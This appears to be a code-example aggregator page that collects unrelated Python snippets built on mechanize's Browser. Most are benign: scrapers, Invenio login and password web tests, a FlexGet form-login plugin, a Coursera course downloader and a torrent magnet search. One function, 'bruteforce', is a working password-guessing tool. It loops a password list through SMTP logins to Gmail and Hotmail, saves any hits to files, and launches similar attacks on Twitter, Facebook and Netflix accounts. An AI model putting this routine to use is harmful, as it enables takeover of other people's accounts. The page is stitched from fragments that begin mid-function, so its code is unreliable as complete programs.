        team2 = teams[1]

        x1 = str(pg.find_all('a')[1].find().get_text().replace('\n', ''))
        x2 = str(pg.find_all('a')[2].find().get_text().replace('\n', ''))
        x3 = str(pg.find_all('a')[3].find().get_text().replace('\n', ''))

        return [team1, team2, x1, x2, x3]

    def write_games_odds(self):
        for pg in self.page:
            self._write_file(self._get_games_odds(pg))

    def _write_file(self, line):
        try:
            with open(self.filename, "a") as f:
                f.write('\n' + self.time)
                for x in line:
                    f.write(';' + x)
        except:
            print('Criando arquivo: ' + self.filename)
            with open(self.filename, "w") as f:
                f.write('\n' + self.time)
                for x in line:
                    f.write(';' + x)
Example #36
 def set_cookiejar(self, *args, **kwargs):
     B.set_cookiejar(self, *args, **kwargs)
     self._clone_actions['set_cookiejar'] = ('set_cookiejar', args, kwargs)
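Examples #31 through #36 and #38 all record configuration calls in _clone_actions; presumably the wrapper replays them when cloning itself. A minimal sketch of such a clone() method, written under that assumption (the real implementation is not shown):

def clone(self):
    # Sketch (assumption): build a fresh wrapper and replay every recorded
    # configuration call on it.
    new = self.__class__()
    for method_name, args, kwargs in self._clone_actions.values():
        getattr(new, method_name)(*args, **kwargs)
    return new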
def bruteforce(self):
    progress = Progressbar(self,
                           orient=HORIZONTAL,
                           length=200,
                           mode='determinate')
    progress.place(x=600, y=200)
    use = OptionParser()

    use.add_option("-g",
                   "--gmail",
                   dest="gmail",
                   help="Write Your Account gmail")
    use.add_option("-t",
                   "--hotmail",
                   dest="hotmail",
                   help="Write Your Account hotmail")
    use.add_option("-T",
                   "--twitter",
                   dest="twitter",
                   help="Write Your Account twitter")
    use.add_option("-f",
                   "--facebook",
                   dest="facebook",
                   help="Write Your Account facebook")
    use.add_option("-n",
                   "--netflix",
                   dest="netflix",
                   help="Write Your Account Netflix")
    use.add_option("-l",
                   "--list",
                   dest="list_password",
                   help="Write Your list passowrd")
    use.add_option("-p",
                   "--password",
                   dest="password",
                   help="Write Your passowrd ")
    use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ")
    (options, args) = use.parse_args()

    brows = Browser()
    brows.set_handle_robots(False)
    brows._factory.is_html = True
    brows.set_cookiejar(cookielib.LWPCookieJar())
    useragents = [
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
        'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'
    ]
    brows.addheaders = [('User-agent', random.choice(useragents))]
    brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                             max_time=1)
    proxyList = options.proxy
    if options.gmail == None:
        if options.hotmail == None:
            if options.twitter == None:
                if options.facebook == None:
                    if options.netflix == None:
                        print(use.usage)
                        exit()
        elif options.hotmail != None or options.gmail == None:
            smtp_srverH = smtplib.SMTP('smtp.live.com', 587)
            smtp_srverH.ehlo()
            smtp_srverH.starttls()
            if options.password != None or options.list_password == None:
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverH.login(options.hotmail, options.password)
                    print("Found Password :{} \t Found Hotmail:{}".format(
                        options.password, options.hotmail))
                    Save = io.open(
                        "Hotmail.txt",
                        "a").write("Account Hotmail:" + options.hotmail +
                                   "\t\tPassword:"******"\n")
                except:
                    print("Not Found Password : {} \t Email Hotmail:{}".format(
                        options.password, options.hotmail))
            elif options.list_password != None or options.password == None:
                password_list = io.open(options.list_password, "r").readlines()
                for password in password_list:
                    try:
                        print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                        smtp_srverH.login(options.hotmail, password)
                        print("FOUND Password :{} \n Found Hotmail:{}".format(
                            password, options.hotmail))
                        Save = io.open(
                            "Hotmail.txt",
                            "a").write("Account Hotmail:" + options.hotmail +
                                       "\t\tPassword:"******"\n")
                    except smtplib.SMTPAuthenticationError:
                        print("Not Found Password : {} \t Email Hotmail:{}".
                              format(password, options.hotmail))
        if options.twitter != None:
            hejab = threading.Thread(target=twitter, name="hejab")
            hejab.start()
        if options.facebook != None:
            facebook(brows)
        if options.netflix != None:
            netflix = threading.Thread(target=Netflix, name="Netflix")
            netflix.start()

    elif options.gmail != None or options.hotmail == None or options.twitter == None:
        smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587)
        smtp_srverG.ehlo()
        smtp_srverG.starttls()
        if options.password != None or options.list_password == None:
            print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s" % (R, W))
            try:
                smtp_srverG.login(options.gmail, options.password)
                print("Found Password :{} \t Found Gmail:{}".format(
                    options.password, options.gmail))
                Save = io.open("Gmail.txt",
                               "a").write("Account Gmail:" + options.gmail +
                                          "\t\tPassword:"******"\n")
            except:
                print("Not Found Password : {} \t Email Gmail:{}".format(
                    options.password, options.gmail))
        elif options.list_password != None:
            password_list = io.open(options.list_password, "r").readlines()
            for password in password_list:
                password = password.rstrip("\n")
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverG.login(options.gmail, password)
                    print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".
                          format(G, password, options.gmail))
                    Save = io.open("Gmail.txt",
                                   "a").write("Account Gmail:" +
                                              options.gmail + "\t\tPassword:"******"\n")
                    break
                except smtplib.SMTPAuthenticationError:
                    print(
                        "{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>"
                        .format(R, password, options.gmail))

    else:
        print(use.usage)
        exit()
Example #38
    def __init__(self, *args, **kwargs):
        self._clone_actions = {}

        B.__init__(self, *args, **kwargs)
        self.set_cookiejar(CookieJar())
Example #39
def getSolutions(path_prefix, path_proxy):
    global br, username, password

    # create a browser object
    br = Browser()

    # add proxy support to browser
    if len(path_proxy) != 0:
        protocol, proxy = options.proxy.split("://")
        br.set_proxies({protocol: proxy})

    # let browser fool robots.txt
    br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; \
              rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
    br.set_handle_robots(False)

    print "Enter yout SPOJ username :"******"Authenticating " + username
    br.open("http://spoj.com/")
    for form in br.forms():
        if form.attrs['id'] == 'login-form':
            br.form = form
            break
    br["login_user"] = username
    br["password"] = password

    # sign in for a day to avoid timeouts
    br.find_control(name="autologin").selected = True
    br.form.action = "http://www.spoj.com"
    response = br.submit()

    verify = response.read()
    if (verify.find("Authentication failed!") != -1):
        print "Error authenticating - " + username
        exit(0)

    # grab the signed submissions list
    print "Grabbing siglist for " + username
    siglist = br.open("http://www.spoj.com/status/" + username + "/signedlist")

    # dump first nine useless lines in signed list for formatting
    for i in xrange(9):
        siglist.readline()

    # make a list of all AC's and challenges
    print "Filtering siglist for AC/Challenge solutions..."
    mysublist = list()

    while True:
        temp = siglist.readline()

        if temp == '\------------------------------------------------------------------------------/\n':
            # reached end of siglist
            break

        if not len(temp):
            print "Reached EOF, siglist format has probably changed," + \
                    " contact author."
            exit(1)

        entry = [x.strip() for x in temp.split('|')]

        if entry[4] == 'AC' or entry[4].isdigit():
            mysublist.append(entry)

    print "Done !!!"
    return mysublist
def extract(soup, year):
    #print soup
    #print year
    tables = soup.findChildren('table')
    table = tables[4]
    for row in table.findAll('tr'):
        h3 = row.findAll('h3')
        name = h3[0].string
        print name
        td = row.findAll('td')
        role = td[2].string
        print role
        #cover_link = col[3].img['src']
        record = (str(year), name, role)
        print "|".join(record)

mech = Browser()
url = "http://europa.eu/whoiswho/public/index.cfm?fuseaction=idea.hierarchy&nodeID=370629&personID=150128&lang=en"
page1 = mech.open(url)
html1 = page1.read()
soup1 = BeautifulSoup(html1)
extract(soup1, 2007)
#page2 = mech.follow_link(text_regex="Next")
#html2 = page2.read()
#soup2 = BeautifulSoup(html2)
#extract(soup2, 2006)
import scraperwiki

#From http://palewi.re/posts/2008/04/20/python-recipe-grab-a-page-scrape-a-table-download-a-file/

#!/usr/bin/env python
from mechanize import Browser
from BeautifulSoup import BeautifulSoup
    def test_select_records_per_group(self):
        """webuser - test of user preferences setting"""

        # logging in as admin
        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/login")
        browser.select_form(nr=0)
        browser['nickname'] = 'admin'
        browser['password'] = ''
        browser.submit()

        expected_response = "You are logged in as admin"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        # Going to edit page and setting records per group to 25
        browser.open(CFG_SITE_SECURE_URL +
                     "/youraccount/edit/WebSearchSettings")
        browser.select_form(nr=0)
        browser['rg'] = ["25"]
        browser.submit()

        expected_response = "Data has been saved."
        changed_settings_body = browser.response().read()
        try:
            changed_settings_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, changed_settings_body))

        # Going to the search page, making an empty search
        browser.open(CFG_SITE_SECURE_URL)
        browser.select_form(name="search")
        browser.submit()
        expected_response = "1 to 25"
        records_found_body = browser.response().read()
        try:
            records_found_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, records_found_body))

        # Going again to edit and setting records per group back to 10
        browser.open(CFG_SITE_SECURE_URL +
                     "/youraccount/edit/WebSearchSettings")
        browser.select_form(name="edit")
        browser['rg'] = ["10"]
        browser.submit()

        expected_response = "Data has been saved."
        changed_settings_body = browser.response().read()
        try:
            changed_settings_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, changed_settings_body))

        # Logging out!
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/logout")
        expected_response = "You are no longer recognized"
        logout_response_body = browser.response().read()
        try:
            logout_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, logout_response_body))

        # Logging in again
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/login")
        browser.select_form(nr=0)
        browser['nickname'] = 'admin'
        browser['password'] = ''
        browser.submit()

        expected_response = "You are logged in as admin"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        # Let's go to search and check that the setting is still there
        browser.open(CFG_SITE_SECURE_URL)
        browser.select_form(name="search")
        browser.submit()
        expected_response = "1 to 10"
        records_found_body = browser.response().read()
        try:
            records_found_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, records_found_body))

        return
class Lime(Torrent):
    def __init__(self, otherFilters, minSize, debug):
        self._urlBase = "https://www.limetorrents.cc"
        self._urlSearch = u"https://www.limetorrents.cc/search/all/{name} {episode}"
        self._languageDict = {"english": 2, "spanish": 14}
        # convert minSize from bytes to MB
        self._minSize = int(minSize) / 1048576
        self._debug = debug
        extraFilters = u"{otherFilters}"
        if otherFilters != "":
            self._otherFilers = u" " + otherFilters

        else:
            self._otherFilers = ""

        self._urlSearch = ''.join([
            self._urlSearch,
            extraFilters.format(otherFilters=self._otherFilers), '/seeds/1/'
        ])
        self._browser = Browser()
        self._browser.set_handle_robots(False)
        self._cookieJar = cookielib.LWPCookieJar()
        self._browser.set_cookiejar(self._cookieJar)
        self._browser.addheaders = [(
            'User-agent',
            'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'
        ), ('Accept', '*/*'), ('Accept-Encoding', "gzip,deflate")]
        self._browser.open(self._urlBase)

    def episodeSearch(self, serie, episode):
        searchQuery = self._urlSearch.format(
            name=serie, episode=episode["number"]).replace(" ", "-")
        logging.debug(u"searchURL: {}".format(searchQuery))
        try:
            self._browser.open(searchQuery)
            gzipContent = self._browser.response().read()
            html = gzip.GzipFile(fileobj=StringIO.StringIO(gzipContent)).read()
            # Scraping the page.
            soup = BeautifulSoup(html)
            if (soup.body.findAll(text='No results found')):
                logging.error(
                    u"There wasn't results for: {}".format(searchQuery))
                return None

            items = soup.findAll('table', {"class": "table2"})[1].findAll('tr')
            # We skip the first tr because it is the header (no tbody in the html).
            for item in items[1:]:
                #print item
                #print item.findAll("td" ,{"class": "tdnormal"})
                contentLength = item.findAll(
                    "td", {"class": "tdnormal"})[1].text.split(' ')
                if contentLength[1][:2] != 'GB' and float(
                        contentLength[0]) < self._minSize:
                    logging.warning(u"Torrent to small: {}".format(' '.join(
                        [contentLength[0], contentLength[1][:2]])))
                    continue

                linkA = item.find("div", {"class": "tt-name"}).findAll("a")[1]
                infoUrl = linkA['href']
                name = linkA.text
                logging.info(u"Going to download: {}".format(name))
                logging.info(u"File size: {}".format(' '.join(
                    [contentLength[0], contentLength[1][:2]])))
                self._browser.open(''.join([self._urlBase, infoUrl]))
                gzipContent = self._browser.response().read()
                html = gzip.GzipFile(
                    fileobj=StringIO.StringIO(gzipContent)).read()
                soup2 = BeautifulSoup(html)
                #TODO:
                posibleLinks = soup2.findAll('div', {'class': 'downloadarea'})
                for link in posibleLinks:
                    href = link.find('a')['href']
                    if href[0:7] == 'magnet:':
                        return href

            return None
        except HTTPError, e:
            logging.error(
                u"There was an error in the URL {}.".format(searchQuery))
            return None
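A hypothetical instantiation of the Lime class above; the unshown Torrent base class is assumed to need no extra setup, and the constructor arguments, show name and episode number are placeholders:

lime = Lime(otherFilters='', minSize='367001600', debug=False)
magnet = lime.episodeSearch('Some Show', {'number': 'S01E01'})
if magnet is not None:
    print(magnet)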
Example #43
from BeautifulSoup import BeautifulSoup, SoupStrainer
import sys
print sys.stdout.encoding

import re
from mechanize import Browser

f=open("ips2", "r")
br = Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

for line in f:
	url="http://www.geoiptool.com/es/?IP="+line
	print url
	response=br.open(url)
	data = response.read() 
	for item in data.split("\n"):
		if "flag" in item and "class" in item:		
			print item
    def test_password_setting(self):
        """webuser - check password settings"""
        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/login")
        browser.select_form(nr=0)
        browser['nickname'] = 'admin'
        browser['password'] = ''
        browser.submit()

        expected_response = "You are logged in as admin"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        # Going to set new password from "" to "123"
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = ""
        browser['password'] = "******"
        browser['password2'] = "123"
        browser.submit()
        expected_response = "Password successfully edited"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))

        # Going to set a wrong old password
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = "******"
        browser['password'] = "******"
        browser['password2'] = "123"
        browser.submit()
        expected_response = "Wrong old password inserted"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))

        # Going to put different new passwords
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = "******"
        browser['password'] = "******"
        browser['password2'] = "321"
        browser.submit()
        expected_response = "Both passwords must match"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))

        # Reset the situation
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit")
        browser.select_form(name="edit_password")
        browser['old_password'] = "******"
        browser['password'] = ""
        browser['password2'] = ""
        browser.submit()
        expected_response = "Password successfully edited"
        change_password_body = browser.response().read()
        try:
            change_password_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                    (expected_response, change_password_body))
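    # The four blocks above repeat the same index()/ValueError check.  A helper
    # along these lines (a sketch, not part of the original test suite) would
    # collapse each check into one call:
    def _assert_body_contains(self, browser, expected):
        body = browser.response().read()
        if expected not in body:
            self.fail("Expected to see %s, got %s." % (expected, body))
    # usage: self._assert_body_contains(browser, "Password successfully edited")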
Example #45
    def on_task_start(self, task, config):
        try:
            from mechanize import Browser
        except ImportError:
            raise PluginError('mechanize required (python module), please install it.', log)

        userfield = config.get('userfield', 'username')
        passfield = config.get('passfield', 'password')

        url = config['url']
        username = config['username']
        password = config['password']

        br = Browser()
        br.set_handle_robots(False)
        try:
            br.open(url)
        except Exception as e:
            # TODO: improve error handling
            raise PluginError('Unable to post login form', log)

        #br.set_debug_redirects(True)
        #br.set_debug_responses(True)
        #br.set_debug_http(True)

        for form in br.forms():
            loginform = form

            try:
                loginform[userfield] = username
                loginform[passfield] = password
                break
            except Exception as e:
                pass
        else:
            received = os.path.join(task.manager.config_base, 'received')
            if not os.path.isdir(received):
                os.mkdir(received)
            filename = os.path.join(received, '%s.formlogin.html' % task.name)
            f = open(filename, 'w')
            f.write(br.response().get_data())
            f.close()
            log.critical('I have saved the login page content to %s for you to view' % filename)
            raise PluginError('Unable to find login fields', log)

        br.form = loginform

        br.submit()

        cookiejar = br._ua_handlers["_cookies"].cookiejar

        # Add cookiejar to our requests session
        task.requests.add_cookiejar(cookiejar)
        # Add handler to urllib2 default opener for backwards compatibility
        handler = urllib2.HTTPCookieProcessor(cookiejar)
        if urllib2._opener:
            log.debug('Adding HTTPCookieProcessor to default opener')
            urllib2._opener.add_handler(handler)
        else:
            log.debug('Creating new opener and installing it')
            urllib2.install_opener(urllib2.build_opener(handler))
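    # For reference, a config dict that satisfies the lookups above would look
    # roughly like this (key names come straight from the config.get()/config[]
    # calls; the URL and credentials are placeholders):
    #
    #     config = {
    #         'url': 'http://example.com/login.php',
    #         'username': 'myuser',
    #         'password': 'mypass',
    #         'userfield': 'username',   # optional, defaults to 'username'
    #         'passfield': 'password',   # optional, defaults to 'password'
    #     }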
    def test_email_caseless(self):
        """webuser - check email caseless"""
        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/register")
        browser.select_form(nr=0)
        browser['email'] = '*****@*****.**'
        browser['nickname'] = 'foobar'
        browser['password'] = '******'
        browser['password2'] = '123456'
        browser.submit()

        expected_response = "Account created"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/register")
        browser.select_form(nr=0)
        browser['email'] = '*****@*****.**'
        browser['nickname'] = 'foobar2'
        browser['password'] = '******'
        browser['password2'] = '123456'
        browser.submit()

        expected_response = "Registration failure"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))

        browser = Browser()
        browser.open(CFG_SITE_SECURE_URL + "/youraccount/register")
        browser.select_form(nr=0)
        browser['email'] = '*****@*****.**'
        browser['nickname'] = 'foobar2'
        browser['password'] = '******'
        browser['password2'] = '123456'
        browser.submit()

        expected_response = "Registration failure"
        login_response_body = browser.response().read()
        try:
            login_response_body.index(expected_response)
        except ValueError:
            self.fail("Expected to see %s, got %s." % \
                      (expected_response, login_response_body))
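    # What the three registrations above exercise: account emails are treated
    # case-insensitively, so a second registration that differs only in case must
    # fail.  A sketch of the comparison involved (illustrative only, not Invenio's
    # actual implementation):
    #
    #     def same_email(a, b):
    #         return a.strip().lower() == b.strip().lower()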
Example #47
class CourseraDownloader(object):
    """
    Class to download content (videos, lecture notes, ...) from coursera.org for
    use offline.

    https://github.com/dgorissen/coursera-dl
    """

    BASE_URL =    'http://class.coursera.org/%s'
    HOME_URL =    BASE_URL + '/class/index'
    LECTURE_URL = BASE_URL + '/lecture/index'
    LOGIN_URL =   BASE_URL + '/auth/auth_redirector?type=login&subtype=normal'
    QUIZ_URL =    BASE_URL + '/quiz/index'

    DEFAULT_PARSER = "lxml"

    def __init__(self,username,password,parser=DEFAULT_PARSER):
        """Requires your coursera username and password. 
        You can also specify the parser to use (defaults to lxml), see http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser
        """
        self.username = username
        self.password = password
        self.parser = parser

        self.browser = Browser()
        self.browser.set_handle_robots(False)

    def login(self,course_name):
        print "* Authenticating as %s..." % self.username

        # open the course login page
        page = self.browser.open(self.LOGIN_URL % course_name)

        # check if we are already logged in by checking for a password field
        bs = BeautifulSoup(page,self.parser)
        pwdfield = bs.findAll("input",{"id":"password_login"})

        if pwdfield:
            self.browser.form = self.browser.forms().next()
            self.browser['email'] = self.username
            self.browser['password'] = self.password
            r = self.browser.submit()

            # check that authentication actually succeeded
            bs2 = BeautifulSoup(r.read(),self.parser)
            title = bs2.title.string
            if "Login Failed" in title:
                raise Exception("Failed to authenticate as %s" % (self.username,))
 
        else:
            # no login form, already logged in
            print "* Already logged in"


    def course_name_from_url(self,course_url):
        """Given the course URL, return the name, e.g., algo2012-p2"""
        return course_url.split('/')[3]

    def lecture_url_from_name(self,course_name):
        """Given the name of a course, return the video lecture url"""
        return self.LECTURE_URL % course_name

    def get_downloadable_content(self,course_url):
        """Given the video lecture URL of the course, return a list of all
        downloadable resources."""

        cname = self.course_name_from_url(course_url)

        print "* Collecting downloadable content from " + course_url

        # get the course name, and redirect to the course lecture page
        vidpage = self.browser.open(course_url)

        # extract the weekly classes
        soup = BeautifulSoup(vidpage,self.parser)
        headers = soup.findAll("h3", { "class" : "list_header" })

        weeklyTopics = []
        allClasses = {}

        # for each weekly class
        for header in headers:
            ul = header.findNext('ul')
            sanitisedHeaderName = sanitiseFileName(header.text)
            weeklyTopics.append(sanitisedHeaderName)
            lis = ul.findAll('li')
            weekClasses = {}

            # for each lecture in a weekly class
            classNames = []
            for li in lis:
                className = sanitiseFileName(li.a.text)
                classNames.append(className)
                classResources = li.find('div', {'class': 'item_resource'})

                hrefs = classResources.findAll('a')

                # for each resource of that lecture (slides, pdf, ...)
                # (don't set a filename here; it will be inferred from the response headers)
                resourceLinks = [ (h['href'],None) for h in hrefs]
 
                # check if the video is included in the resources; if not, try
                # to download it directly
                hasvid = [x for x,_ in resourceLinks if x.find('.mp4') > 0]
                if not hasvid:
                    ll = li.find('a',{'class':'lecture-link'})
                    lurl = ll['data-lecture-view-link']
                    p = self.browser.open(lurl)
                    bb = BeautifulSoup(p,self.parser)
                    vobj = bb.find('source',type="video/mp4")

                    if not vobj:
                        print " Warning: Failed to find video for %s" %  className
                    else:
                        vurl = vobj['src']
                        # build the matching filename
                        fn = className + ".mp4"
                        resourceLinks.append( (vurl,fn) )

                weekClasses[className] = resourceLinks

            # keep track of the list of classNames in the order they appear in the html
            weekClasses['classNames'] = classNames

            allClasses[sanitisedHeaderName] = weekClasses

        return (weeklyTopics, allClasses)
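        # Shape of the returned data (derived from the code above):
        #   weeklyTopics: ['Week 1 header', ...] in page order
        #   allClasses:   {
        #       'Week 1 header': {
        #           'classNames': ['Lecture title', ...],
        #           'Lecture title': [(resource_url, None), ..., (video_url, 'Lecture title.mp4')],
        #       },
        #       ...
        #   }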

    def download(self, url, target_dir=".", target_fname=None):
        """Download the url to the given filename"""
        r = self.browser.open(url)

        # get the headers
        headers = r.info()

        # get the content length (if present)
        clen = int(headers['Content-Length']) if 'Content-Length' in headers else -1 
 
        # build the absolute path we are going to write to
        fname = target_fname or sanitiseFileName(CourseraDownloader.getFileName(headers)) or CourseraDownloader.getFileNameFromURL(url)
        filepath = os.path.join(target_dir,fname)

        dl = True
        if os.path.exists(filepath):
            if clen > 0: 
                fs = os.path.getsize(filepath)
                delta = clen - fs

                # all we know is that the current filesize may be shorter than it should be and the content length may be incorrect
                # overwrite the file if the reported content length is bigger than what we have already by at least k bytes (arbitrary)

                # TODO this is still not foolproof as the fundamental problem is that the content length cannot be trusted
                # so this really needs to be avoided and replaced by something else, eg., explicitly storing what downloaded correctly
                if delta > 2:
                    print '    - "%s" seems incomplete, downloading again' % fname
                else:
                    print '    - "%s" already exists, skipping' % fname
                    dl = False
            else:
                # missing or invalid content length
                # assume all is ok...
                dl = False

        try:
            if dl: self.browser.retrieve(url,filepath)
        except Exception as e:
            print "Failed to download url %s to %s: %s" % (url,filepath,e)

    def download_course(self,cname,dest_dir="."):
        """Download all the contents (quizzes, videos, lecture notes, ...) of the course to the given destination directory (defaults to .)"""

        # Ensure we are logged in
        self.login(cname)

        # get the lecture url
        course_url = self.lecture_url_from_name(cname)

        (weeklyTopics, allClasses) = self.get_downloadable_content(course_url)
        print '* Got all downloadable content for ' + cname

        course_dir = os.path.abspath(os.path.join(dest_dir,cname))

        # ensure the course directory exists (makedirs also creates missing parents)
        if not os.path.exists(course_dir):
            os.makedirs(course_dir)

        print "* " + cname + " will be downloaded to " + course_dir

        # download the standard pages
        print " - Downloading lecture/syllabus pages"
        self.download(self.HOME_URL % cname,target_dir=course_dir,target_fname="index.html")
        self.download(course_url,target_dir=course_dir,target_fname="lectures.html")

        # commented out because of https://github.com/dgorissen/coursera-dl/issues/2
        # self.download((self.BASE_URL + '/wiki/view?page=syllabus') % cname, target_dir=course_dir,target_fname="syllabus.html")
        # download the quizzes & homeworks
        #for qt in ['quiz','homework']:
        #    print "  - Downloading the '%s' quizzes" % qt
        #    try:
        #        self.download_quizzes(cname,course_dir,quiz_type=qt)
        #    except Exception as e:
        #        print "  - Failed %s" % e

        # now download the actual content (videos, lecture notes, ...)
        for j,weeklyTopic in enumerate(weeklyTopics,start=1):
            if weeklyTopic not in allClasses:
                #print 'Weekly topic not in all classes:', weeklyTopic
                continue

            # ensure the week dir exists
            # add a numeric prefix to the week directory name to ensure chronological ordering
            wkdirname = str(j).zfill(2) + " - " + weeklyTopic
            wkdir = os.path.join(course_dir,wkdirname)
            if not os.path.exists(wkdir):
                os.makedirs(wkdir)

            weekClasses = allClasses[weeklyTopic]
            classNames = weekClasses['classNames']

            print " - " + weeklyTopic

            for i,className in enumerate(classNames,start=1):
                if className not in weekClasses:
                    continue

                classResources = weekClasses[className]

                # ensure the class dir exists
                clsdirname = str(i).zfill(2) + " - " + className
                clsdir = os.path.join(wkdir,clsdirname)
                if not os.path.exists(clsdir): 
                    os.makedirs(clsdir)

                print "  - Downloading resources for " + className

                for classResource,tfname in classResources:
                    if not isValidURL(classResource):
                        absoluteURLGen = AbsoluteURLGen(course_url)
                        classResource = absoluteURLGen.get_absolute(classResource)
                        print "  -" + classResource, ' - is not a valid url'

                        if not isValidURL(classResource):
                            print "  -" + classResource, ' - is not a valid url'
                            continue

                    try:
                        #print '  - Downloading ', classResource
                        self.download(classResource,target_dir=clsdir,target_fname=tfname)
                    except Exception as e:
                        print "    - failed: ",classResource,e


    def download_quizzes(self,course,target_dir,quiz_type="quiz"):
        """Download each of the quizzes as separate html files, the quiz type is
        typically quiz or homework"""

        # extract the list of all quizzes
        qurl = (self.QUIZ_URL + "?quiz_type=" + quiz_type) % course
        p = self.browser.open(qurl)
        bs = BeautifulSoup(p,self.parser)

        qlist = bs.find('div',{'class':'item_list'})
        qurls = [q['href'].replace('/start?','/attempt?') for q in qlist.findAll('a',{'class':'btn primary'})]
        titles = [t.string for t in qlist.findAll('h4')]

        # ensure the target directory exists
        dir = os.path.join(target_dir,quiz_type)

        try:
            os.makedirs(dir)
        except OSError as e:
            if e.errno == errno.EEXIST:
                pass
            else: raise

        # download each one
        for i,it in enumerate(zip(qurls,titles),start=1):
            q,t = it
            fname = os.path.join(dir,str(i).zfill(2) + " - " + sanitiseFileName(t) + ".html")
            if os.path.exists(fname):
                pass
                #print "  - already exists, skipping"
            else:
                self.browser.retrieve(q,fname)

    @staticmethod
    def extractFileName(contentDispositionString):
        #print contentDispositionString
        pattern = 'attachment; filename="(.*?)"'
        m = re.search(pattern, contentDispositionString)
        try:
            return m.group(1)
        except Exception:
            return ''
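    # e.g. (illustrative):
    #   >>> CourseraDownloader.extractFileName('attachment; filename="01-intro.pdf"')
    #   '01-intro.pdf'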

    @staticmethod
    def getFileName(header):
        try:
            return CourseraDownloader.extractFileName(header['Content-Disposition']).lstrip()
        except Exception:
            return '' 

    @staticmethod
    def getFileNameFromURL(url):
        # take the last path component and unquote it
        fname = urllib.unquote(url.split('/')[-1])
        # the unquoted value may itself contain slashes, so split again
        fname = fname.split('/')[-1]

        # add an extension if none
        ext = os.path.splitext(fname)[1]
        if not ext: fname += ".html"

        return fname
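# A minimal usage sketch for the class above.  The credentials are placeholders and
# the course short-name is the token from the class.coursera.org URL (e.g. algo2012-p2,
# as mentioned in the course_name_from_url docstring):
if __name__ == '__main__':
    d = CourseraDownloader("you@example.org", "my-password")
    d.download_course("algo2012-p2", dest_dir=".")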
import mechanize
from mechanize import Browser
from bs4 import BeautifulSoup as BS
import json

br = Browser()

# Browser options
# Ignore robots.txt. Do not do this without thought and consideration.
br.set_handle_robots(False)
# Don't add Referer (sic) header
br.set_handle_referer(False)

# Follow refresh 0, but don't hang on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)

#Setting the user agent
br.addheaders = [(
    'User-agent',
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
)]

br.open('https://www.linkedin.com/in/shashankgaurav')

